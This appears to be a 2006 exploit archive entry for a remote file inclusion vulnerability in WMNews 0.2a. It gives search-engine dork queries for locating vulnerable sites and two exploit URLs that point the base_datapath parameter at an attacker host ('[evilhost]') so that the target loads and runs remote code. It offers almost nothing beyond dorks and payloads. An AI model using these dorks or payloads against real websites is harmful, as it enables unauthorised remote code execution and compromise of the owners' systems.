id: 610
date: 07/26/2006
title: WMNews <= 0.2a (base_datapath) Remote Inclusion Vulnerability
author: uNfz
cves: 

=============================================================
WMNews <= 0.2a (base_datapath) Remote Inclusion Vulnerability
=============================================================




       Advisory: WMNews Remote File Include Vulnerability
 Release Date: 2006/07/26
         Author: uNfz
  Critical Level: High
         Vendor: Warta Mikael

--------------------
--------------------

Searching / Dork:

allinurl: *.php?Artid=*
allinurl: *.php?ArtCat=*
allinurl: wmprint.php
allinurl: wmview.php

--------------------

exploration:

/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]

--------------------



#  0day.today [2023-03-23]  #